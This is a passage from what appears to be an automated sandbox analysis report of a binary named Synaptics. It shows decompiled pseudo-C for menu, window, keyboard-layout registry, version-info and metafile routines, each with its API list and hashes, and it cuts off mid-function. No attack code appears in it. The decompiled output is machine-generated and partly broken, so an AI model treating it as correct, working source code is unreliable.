                                                                                                                                                                                                                            0x0044aa0a
                                                                                                                                                                                                                            0x0044ab56
                                                                                                                                                                                                                            0x0044ab5e
                                                                                                                                                                                                                            0x0044ab63
                                                                                                                                                                                                                            0x0044ab65
                                                                                                                                                                                                                            0x0044ab98
                                                                                                                                                                                                                            0x0044ab67
                                                                                                                                                                                                                            0x0044ab6a
                                                                                                                                                                                                                            0x0044ab7f
                                                                                                                                                                                                                            0x0044ab7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ab65
                                                                                                                                                                                                                            0x0044aa10
                                                                                                                                                                                                                            0x0044aa17
                                                                                                                                                                                                                            0x0044aa25
                                                                                                                                                                                                                            0x0044aa29
                                                                                                                                                                                                                            0x0044aa40
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x0044aa4a
                                                                                                                                                                                                                            0x0044aa4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa54
                                                                                                                                                                                                                            0x0044aa54
                                                                                                                                                                                                                            0x0044aaa3
                                                                                                                                                                                                                            0x0044aaca
                                                                                                                                                                                                                            0x0044aad1
                                                                                                                                                                                                                            0x0044aad6
                                                                                                                                                                                                                            0x0044aadb
                                                                                                                                                                                                                            0x0044aae0
                                                                                                                                                                                                                            0x0044aaeb
                                                                                                                                                                                                                            0x0044aaf7
                                                                                                                                                                                                                            0x0044ab00
                                                                                                                                                                                                                            0x0044ab00
                                                                                                                                                                                                                            0x0044ab0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ab0c
                                                                                                                                                                                                                            0x0044aa29
                                                                                                                                                                                                                            0x0044a9b9
                                                                                                                                                                                                                            0x0044a9bc
                                                                                                                                                                                                                            0x0044a9be
                                                                                                                                                                                                                            0x0044a9d8
                                                                                                                                                                                                                            0x0044a9d8
                                                                                                                                                                                                                            0x0044a9db
                                                                                                                                                                                                                            0x0044a9e7
                                                                                                                                                                                                                            0x0044a9ec
                                                                                                                                                                                                                            0x0044a9f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9f7
                                                                                                                                                                                                                            0x0044a9c0
                                                                                                                                                                                                                            0x0044a9c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9c9
                                                                                                                                                                                                                            0x0044a9cf
                                                                                                                                                                                                                            0x0044a9d4
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x0044a9ad
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                                                                                                                                                                                              • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$CreateInsertItemPopupVersion
                                                                                                                                                                                                                            • String ID: ,$?
                                                                                                                                                                                                                            • API String ID: 133695497-2308483597
                                                                                                                                                                                                                            • Opcode ID: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                                                            • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496e766476e5cbb51b460a7aff5d95828f717add555cf79c0a8667af29b108e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442BD0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x49de0c; // 0x49ebbc
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x442da9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0043AFAC(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0043C1D4(_v8,  &_v28);
				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00458218() -  *(_v8 + 0x4c);
				}
				if(E00458224() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00458224() -  *(_v8 + 0x48);
				}
				if(E0045820C() > _v28) {
					_v28 = E0045820C();
				}
				if(E00458200() > _v16) {
					_v16 = E00458200();
				}
				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00445E24( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x49bc1c(E00441704(_v8), "true",  *0x0049BD24 | 0x00040000);
					}
				}
				_t80 =  *0x49dbcc; // 0x49ebb8
				_t45 =  *_t80 + 0x30; // 0x70374
				E0043EE38(_v8,  *_t45);
				ShowWindow(E00441704(_v8), "true");
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x442db0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                                                                                                                                                                                                            0x00442bde
                                                                                                                                                                                                                            0x00442bdf
                                                                                                                                                                                                                            0x00442be0
                                                                                                                                                                                                                            0x00442be1
                                                                                                                                                                                                                            0x00442be2
                                                                                                                                                                                                                            0x00442be4
                                                                                                                                                                                                                            0x00442be7
                                                                                                                                                                                                                            0x00442bf0
                                                                                                                                                                                                                            0x00442bf9
                                                                                                                                                                                                                            0x00442bfa
                                                                                                                                                                                                                            0x00442bff
                                                                                                                                                                                                                            0x00442c02
                                                                                                                                                                                                                            0x00442c0a
                                                                                                                                                                                                                            0x00442c0f
                                                                                                                                                                                                                            0x00442c19
                                                                                                                                                                                                                            0x00442c30
                                                                                                                                                                                                                            0x00442c3f
                                                                                                                                                                                                                            0x00442c3f
                                                                                                                                                                                                                            0x00442c54
                                                                                                                                                                                                                            0x00442c63
                                                                                                                                                                                                                            0x00442c63
                                                                                                                                                                                                                            0x00442c70
                                                                                                                                                                                                                            0x00442c79
                                                                                                                                                                                                                            0x00442c79
                                                                                                                                                                                                                            0x00442c86
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442cb5
                                                                                                                                                                                                                            0x00442ccd
                                                                                                                                                                                                                            0x00442cf5
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d0d
                                                                                                                                                                                                                            0x00442d16
                                                                                                                                                                                                                            0x00442d24
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d59
                                                                                                                                                                                                                            0x00442d60
                                                                                                                                                                                                                            0x00442d66
                                                                                                                                                                                                                            0x00442d76
                                                                                                                                                                                                                            0x00442d80
                                                                                                                                                                                                                            0x00442d85
                                                                                                                                                                                                                            0x00442d88
                                                                                                                                                                                                                            0x00442d8b
                                                                                                                                                                                                                            0x00442d98
                                                                                                                                                                                                                            0x00442d9e
                                                                                                                                                                                                                            0x00442da1
                                                                                                                                                                                                                            0x00442da8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442CBA
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                                                                                                                                                                                            • AnimateWindow.USER32(00000000,?,00000001), ref: 00442D53
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                                                                                                                                                                                              • Part of subcall function 00445E24: GetCursorPos.USER32(?), ref: 00445E28
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442D90
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3024527889-0
                                                                                                                                                                                                                            • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458464 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x45860f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x458616);
					return E004049C0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
					E004049C0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00446294( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4585cb);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404C30( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404C30(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4585d2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                                                                                                                                                                                                            0x00458464
                                                                                                                                                                                                                            0x00458465
                                                                                                                                                                                                                            0x00458467
                                                                                                                                                                                                                            0x00458470
                                                                                                                                                                                                                            0x00458476
                                                                                                                                                                                                                            0x0045847b
                                                                                                                                                                                                                            0x0045847c
                                                                                                                                                                                                                            0x00458481
                                                                                                                                                                                                                            0x00458484
                                                                                                                                                                                                                            0x0045848e
                                                                                                                                                                                                                            0x004585f0
                                                                                                                                                                                                                            0x004585f8
                                                                                                                                                                                                                            0x004585fb
                                                                                                                                                                                                                            0x004585fe
                                                                                                                                                                                                                            0x0045860e
                                                                                                                                                                                                                            0x00458494
                                                                                                                                                                                                                            0x004584a3
                                                                                                                                                                                                                            0x004584ac
                                                                                                                                                                                                                            0x004584bf
                                                                                                                                                                                                                            0x004584c2
                                                                                                                                                                                                                            0x004585df
                                                                                                                                                                                                                            0x004585e5
                                                                                                                                                                                                                            0x004585eb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584c8
                                                                                                                                                                                                                            0x004584c9
                                                                                                                                                                                                                            0x004584d2
                                                                                                                                                                                                                            0x004584d5
                                                                                                                                                                                                                            0x004584e1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584e7
                                                                                                                                                                                                                            0x004584f9
                                                                                                                                                                                                                            0x004584ff
                                                                                                                                                                                                                            0x00458529
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045852f
                                                                                                                                                                                                                            0x00458531
                                                                                                                                                                                                                            0x00458532
                                                                                                                                                                                                                            0x00458537
                                                                                                                                                                                                                            0x0045853a
                                                                                                                                                                                                                            0x0045853d
                                                                                                                                                                                                                            0x00458563
                                                                                                                                                                                                                            0x00458576
                                                                                                                                                                                                                            0x0045858e
                                                                                                                                                                                                                            0x0045859c
                                                                                                                                                                                                                            0x004585af
                                                                                                                                                                                                                            0x004585af
                                                                                                                                                                                                                            0x0045859c
                                                                                                                                                                                                                            0x004585b6
                                                                                                                                                                                                                            0x004585b9
                                                                                                                                                                                                                            0x004585bc
                                                                                                                                                                                                                            0x004585ca
                                                                                                                                                                                                                            0x004585ca
                                                                                                                                                                                                                            0x00458529
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004585d2
                                                                                                                                                                                                                            0x004585d2
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584d5
                                                                                                                                                                                                                            0x004584c2
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,021E1320,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                                                                                                                                                                                            • layout text, xrefs: 00458553
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                                                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                                                                                                            • API String ID: 1703357764-2652665750
                                                                                                                                                                                                                            • Opcode ID: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                                                            • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df926e6deaf19fa000fafb0216c6eac1fe6f0f171fb7691c1be8eeb1514cdfa6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474948 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00474948(char __eax, void* __ebx, void* __ecx, char __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed short* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				intOrPtr _t52;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t76;
				void* _t93;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t110;
				intOrPtr _t111;

				_t109 = _t110;
				_t111 = _t110 + 0xffffffc4;
				_v40 = 0;
				_t93 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t109);
				_push(0x474ab3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				E004049C0(__ecx);
				_v32 = 0xff;
				_push( &_v28);
				_t52 = E00404ED8( &_v8);
				_push(_t52);
				L004072A8();
				_v24 = _t52;
				if(_v24 == 0) {
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(E00474ABA);
					E004049C0( &_v40);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = E0040275C(_v24);
					_push(_t109);
					_push(0x474a89);
					_push( *[fs:eax]);
					 *[fs:eax] = _t111;
					_push(_v16);
					_push(_v24);
					_push(_v28);
					_t65 = E00404ED8( &_v8);
					_push(_t65);
					L004072A0();
					if(_t65 != 0) {
						_push( &_v32);
						_push( &_v36);
						_push("\\VarFileInfo\\Translation");
						_t71 = _v16;
						_push(_t71);
						L004072B0();
						if(_t71 != 0) {
							_v64 =  *_v36 & 0x0000ffff;
							_v60 = 0;
							_v56 = E004079DC( *_v36) & 0x0000ffff;
							_v52 = 0;
							_v48 = _v12;
							_v44 = 0xb;
							E0040A664("\\StringFileInfo\\%0.4x%0.4x\\%s", 2,  &_v64,  &_v40);
							E00404A58( &_v12, _v40);
						}
						_push( &_v32);
						_push( &_v20);
						_push(E00404ED8( &_v12));
						_t76 = _v16;
						_push(_t76);
						L004072B0();
						if(_t76 != 0) {
							E0040A174(_v20, _t93);
						}
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(E00474A90);
					return E0040277C(_v16);
				}
			}




























                                                                                                                                                                                                                            0x00474949
                                                                                                                                                                                                                            0x0047494b
                                                                                                                                                                                                                            0x00474951
                                                                                                                                                                                                                            0x00474954
                                                                                                                                                                                                                            0x00474956
                                                                                                                                                                                                                            0x00474959
                                                                                                                                                                                                                            0x0047495f
                                                                                                                                                                                                                            0x00474967
                                                                                                                                                                                                                            0x0047496e
                                                                                                                                                                                                                            0x0047496f
                                                                                                                                                                                                                            0x00474974
                                                                                                                                                                                                                            0x00474977
                                                                                                                                                                                                                            0x0047497c
                                                                                                                                                                                                                            0x00474981
                                                                                                                                                                                                                            0x0047498b
                                                                                                                                                                                                                            0x0047498f
                                                                                                                                                                                                                            0x00474994
                                                                                                                                                                                                                            0x00474995
                                                                                                                                                                                                                            0x0047499a
                                                                                                                                                                                                                            0x004749a1
                                                                                                                                                                                                                            0x00474a92
                                                                                                                                                                                                                            0x00474a95
                                                                                                                                                                                                                            0x00474a98
                                                                                                                                                                                                                            0x00474aa0
                                                                                                                                                                                                                            0x00474ab2
                                                                                                                                                                                                                            0x004749a7
                                                                                                                                                                                                                            0x004749af
                                                                                                                                                                                                                            0x004749b4
                                                                                                                                                                                                                            0x004749b5
                                                                                                                                                                                                                            0x004749ba
                                                                                                                                                                                                                            0x004749bd
                                                                                                                                                                                                                            0x004749c3
                                                                                                                                                                                                                            0x004749c7
                                                                                                                                                                                                                            0x004749cb
                                                                                                                                                                                                                            0x004749cf
                                                                                                                                                                                                                            0x004749d4
                                                                                                                                                                                                                            0x004749d5
                                                                                                                                                                                                                            0x004749dc
                                                                                                                                                                                                                            0x004749e5
                                                                                                                                                                                                                            0x004749e9
                                                                                                                                                                                                                            0x004749ea
                                                                                                                                                                                                                            0x004749ef
                                                                                                                                                                                                                            0x004749f2
                                                                                                                                                                                                                            0x004749f3
                                                                                                                                                                                                                            0x004749fa
                                                                                                                                                                                                                            0x00474a06
                                                                                                                                                                                                                            0x00474a09
                                                                                                                                                                                                                            0x00474a1a
                                                                                                                                                                                                                            0x00474a1d
                                                                                                                                                                                                                            0x00474a24
                                                                                                                                                                                                                            0x00474a27
                                                                                                                                                                                                                            0x00474a38
                                                                                                                                                                                                                            0x00474a43
                                                                                                                                                                                                                            0x00474a43
                                                                                                                                                                                                                            0x00474a4b
                                                                                                                                                                                                                            0x00474a4f
                                                                                                                                                                                                                            0x00474a58
                                                                                                                                                                                                                            0x00474a59
                                                                                                                                                                                                                            0x00474a5c
                                                                                                                                                                                                                            0x00474a5d
                                                                                                                                                                                                                            0x00474a64
                                                                                                                                                                                                                            0x00474a6b
                                                                                                                                                                                                                            0x00474a6b
                                                                                                                                                                                                                            0x00474a64
                                                                                                                                                                                                                            0x00474a72
                                                                                                                                                                                                                            0x00474a75
                                                                                                                                                                                                                            0x00474a78
                                                                                                                                                                                                                            0x00474a88
                                                                                                                                                                                                                            0x00474a88

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73AC14E0.VERSION(00000000,?,00000000,00474AB3,?,021E2354), ref: 00474995
                                                                                                                                                                                                                            • 73AC14C0.VERSION(00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3,?,021E2354), ref: 004749D5
                                                                                                                                                                                                                            • 73AC1500.VERSION(00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                                                                                                                                                                                            • 73AC1500.VERSION(00000001,00000000,?,000000FF,00000001,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,00000001,00000000,00474A89,?,00000000), ref: 00474A5D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                                                                                                                                                                                            • \VarFileInfo\Translation, xrefs: 004749EA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: C1500
                                                                                                                                                                                                                            • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                                                                                                                                                                                            • API String ID: 1255762788-999260334
                                                                                                                                                                                                                            • Opcode ID: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
                                                                                                                                                                                                                            • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d274d5b90975b1e4479b0a80aa488c88212d9471dffcee97b3aec67d3ca969
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004288B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E004288B4(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E004032B4( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00426DA8( &_v38);
					_v18 = _t43;
					_push(0);
					L00407638();
					_v16 = _t43;
					_push(_t83);
					_push(0x4289ef);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040275C(_v12);
					_push(_t83);
